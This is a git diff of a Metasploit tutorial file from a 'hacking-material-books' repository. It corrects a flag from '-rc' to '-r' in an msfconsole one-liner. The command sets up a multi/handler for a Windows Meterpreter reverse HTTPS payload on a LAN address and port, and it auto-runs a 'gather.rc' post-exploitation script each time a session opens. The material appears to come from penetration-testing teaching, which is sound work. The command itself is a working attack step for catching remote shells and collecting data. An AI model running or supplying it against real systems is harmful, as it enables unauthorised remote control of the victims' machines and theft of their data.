r00t-3xp10it/hacking-material-books/metasploit-RC[ERB]/metasploit_resource_files.md

 <br /><br />

 - **[in Handler]::AutoRunScript::OneLiner::**`[msfconsole prompt]`<br />
-<blockquote>The easy way to reproduce this is: execute one multi/handler with the 'AutoRunScript' flag executing @darkoperator 'multi_console_command' script with the -rc argument pointing to the absoluct path of our gather.rc script.
+<blockquote>The easy way to reproduce this is: execute one multi/handler with the 'AutoRunScript' flag executing @darkoperator 'multi_console_command' script with the -r argument pointing to the absoluct path of our gather.rc script.
 That will execute our gather.rc (auto-running our resource script automatically at session creation).</blockquote>

-      sudo msfconsole -x 'use exploit/multi/handler; set LHOST 192.168.1.71; set LPORT 666; set PAYLOAD windows/meterpreter/reverse_https; set AutoRunScript multi_console_command -rc /root/gather.rc; exploit'
+      sudo msfconsole -x 'use exploit/multi/handler; set LHOST 192.168.1.71; set LPORT 666; set PAYLOAD windows/meterpreter/reverse_https; set AutoRunScript multi_console_command -r /root/gather.rc; exploit'

 ![gif](http://i67.tinypic.com/20aotfr.gif)